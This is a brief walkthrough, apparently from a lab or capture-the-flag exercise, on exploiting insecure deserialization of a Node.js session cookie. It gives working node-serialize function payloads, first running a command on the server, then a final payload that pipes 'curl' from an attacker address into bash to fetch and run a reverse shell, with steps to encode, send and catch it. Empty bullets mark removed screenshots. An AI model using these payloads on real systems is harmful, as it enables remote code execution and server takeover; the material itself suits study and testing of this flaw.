Javascript Vulnerabilities

Javascript Deserializaiton

• Notice the assigned session cookie

• 
• Attempt to decode the cookie in the decoder tab

• 
• Attempt to modify the cookie by either

Cut the cookie in half to see if you can create a server error
Change the cookies values as seen below

• 
• 
• When we cut the cookie in half we get a server error

• 
• We see that the web application is trying to unserialize the session cookie but it’s getting an error.

• Node Js de-serialization vulnerability is the easiest to exploit since the payload doesn’t change that much

• 
• We will modify the following payload a bit to get it working

{"rce":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ls /',
function(error, stdout, stderr) { console.log(stdout) });\n }()"}

• Encode the cookie and see if that payload works to get command injection

• 
• Create a reverse shell script and make sure to chmod +x the script

• Final Payload

{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl 10.8.2.58:8000/shell.sh | bash ', function(error, stdout, stderr) { console.log(stdout) });\n }()","isAdmin":true,"encoding": "utf-8"}

• Start your listener

• Encode the payload to Base64 and then URL Encode

• 
• 
• Send the request, and get a rev shell!